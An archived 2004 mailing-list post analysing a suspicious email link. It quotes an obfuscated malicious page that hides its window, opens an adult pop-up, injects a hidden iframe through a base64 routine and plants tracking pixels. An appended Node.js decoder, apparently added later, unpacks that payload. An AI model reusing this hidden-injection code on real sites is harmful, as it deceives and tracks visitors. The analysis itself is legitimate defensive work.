New virus?

Spicer, Kevin Kevin.Spicer at BMRB.CO.UK
Tue May 11 15:38:42 IST 2004


Rabellino Sergio wrote:
> Remco Barendse wrote:
>> This is the complete contents of the df file of the virus (I would
>> NOT open the url on a Winblows box!):
>> 
>> <HTML><HEAD></HEAD><BODY bgColor=#ffffff><DIV><FONT face=Arial
>> size=2><BR><A href="http://drs.yahoo.com/ecem.com/NEWS/*http://www.security-warning.biz/personal6/maljo24/www.YAHOO.com/#http://drs.yahoo.com/ecem.com/NEWS">http://drs.yahoo.com/ecem.com/NEWS</A></FONT></DIV></BODY></HTML>

Hmm, someone really doesn't want us to find out what they are up to!

Here's what I've found so far...
Any URL at http://drs.yahoo.com/ followed by a * redirects to the site following the *
The bit after the # seems to be pointless
www.security-warning.com takes you to terra's website (Spanish ISP I think?)
The specific URL takes you to a page (presumably customer space) that redirects to a page called terra.com in the same directory.  That in turn contains the following content, which is mostly javascript obfuscation.....  [by the way both pages contain hundreds of lines of whitespace]



<html><head><title>| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | </title>
<script language=javascript>
function stoperror() {
return true
}
window.onerror=stoperror;
self.moveTo(5000,5000);
self.blur();

var args='left=0,top=0,width='+screen.availWidth-60+',height='+screen.availHeight-60+',fullscreen=0,toolbar=1,location=1,directories=0,status=1,menubar=1,scrollbars=1,resizable=1';
window.open('http://www.danni.com/directors/dannicash?dcwid=100863&redirpg=www.danni.com/free/modelsdir.html','',args);
</script>
</head>
<body onFocus="window.blur();" onMouseOver="window.blur();">

<SCRIPT language=JavaScript>

function bcd(str) {
    var result = "";
    var i = 0;
    var x;
    var shiftreg = 0;
    var count = -1;
    for (i=0; i < str.length; i++) {
        c = str.charAt(i);
        if ('A' <= c && c <= 'Z')
            x = str.charCodeAt(i) - 65;
        else if ('a' <= c && c <= 'z')
            x = str.charCodeAt(i) - 97 + 26;
        else if ('0' <= c && c <= '9')
            x = str.charCodeAt(i) - 48 + 52;
        else if (c == '+')
            x = 62;
        else if (c == '/')
            x = 63;
        else
            continue;
        count++;
        switch (count % 4)
        {
        case 0:
            shiftreg = x;
            continue;
        case 1:
            v = (shiftreg<<2) | (x >> 4);
            shiftreg = x & 0x0F;
            break;
        case 2:
            v = (shiftreg<<4) | (x >> 2);
            shiftreg = x & 0x03;
            break;
        case 3:
            v = (shiftreg<<6) | (x >> 0);
            shiftreg = x & 0x00;
            break;
        }
            result = result + String.fromCharCode(v);
    }
    s=result.toString();
};


</script>
<a target="_top" href="http://t.extreme-dm.com/?login=vrn123">
<img src="http://t1.extreme-dm.com/i.gif" height=1
border=0 width=1 alt=""></a><script language="javascript1.2"><!--
EXs=screen;EXw=EXs.width;navigator.appName!="Netscape"?
EXb=EXs.colorDepth:EXb=EXs.pixelDepth;bcd("PGlmcmFtZSB3aWR0aD0wIGhlaWdodD0wIHNyYz0iaHR0cDovL2NvdW50ZXIuc3Byb3MuY29tLzEvY291bnQuaHRtbCI+PC9pZnJhbWU+");document.writeln(s);//--></script><script language="javascript"><!--
EXd=document;EXw?"":EXw="na";EXb?"":EXb="na";
EXd.write("<img src=\"http://t0.extreme-dm.com",
"/c.g?tag=vrn123&j=y&srw="+EXw+"&srb="+EXb+"&",
"l="+escape(EXd.referrer)+"\" height=1 width=1>");//-->
</script><noscript><img height=1 width=1 alt=""
src="http://t0.extreme-dm.com/c.g?tag=vrn123&j=n"></noscript>

</body></html>



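The bcd() routine in the page quoted above is a plain base64 decoder that leaves its output in the global s for document.writeln(s), so the hidden markup can be recovered statically without loading the page in a browser. The Node.js code below is an added example, not part of the original post; decodeBcd, decodeBcdCalls and hiddenSources are names assumed here, and SAMPLE is the bcd(...) call copied from the script block in the post.

```javascript
// Added example: static decoding of bcd("...") payloads; nothing is executed.
// Function names are assumptions of this example, not from the original post.
const B64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

// Side-effect-free port of the page's bcd(): same shift-register logic,
// but the decoded string is returned instead of stored in the global `s`.
function decodeBcd(str) {
  let out = '';
  let shiftreg = 0;
  let count = -1;
  for (const c of str) {
    const x = B64.indexOf(c);
    if (x < 0) continue;            // like the original, skip '=', whitespace, etc.
    count++;
    const phase = count % 4;
    if (phase === 0) { shiftreg = x; continue; }
    const take = 2 * phase;         // bits taken from the top of x: 2, 4, 6
    out += String.fromCharCode((shiftreg << take) | (x >> (6 - take)));
    shiftreg = x & ((1 << (6 - take)) - 1);   // keep the low bits for the next byte
  }
  return out;
}

// Find every bcd("...") call in page source and decode its argument.
// The function definition `function bcd(str)` is not matched (no quote follows).
function decodeBcdCalls(pageSource) {
  const calls = /\bbcd\(\s*(["'])([A-Za-z0-9+\/=\s]*)\1\s*\)/g;
  return [...pageSource.matchAll(calls)].map((m) => decodeBcd(m[2]));
}

// Pull src= URLs out of the decoded markup so they can be reviewed or blocked.
function hiddenSources(decodedList) {
  const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  return decodedList.flatMap((html) => [...html.matchAll(src)].map((m) => m[1]));
}

// The obfuscated call as it appears in the post.
const SAMPLE = 'EXb=EXs.pixelDepth;bcd("PGlmcmFtZSB3aWR0aD0wIGhlaWdodD0wIHNyYz0iaHR0cDovL2NvdW50ZXIuc3Byb3MuY29tLzEvY291bnQuaHRtbCI+PC9pZnJhbWU+");document.writeln(s);';

for (const html of decodeBcdCalls(SAMPLE)) {
  console.log('decoded markup:', html);
  // Cross-check: the custom routine agrees with a standard base64 decode.
  console.log('hidden src:', hiddenSources([html]));
}
```

Because the routine matches standard base64, any stock decoder gives the same result; the port is only needed to confirm that the page's own logic does nothing beyond decoding.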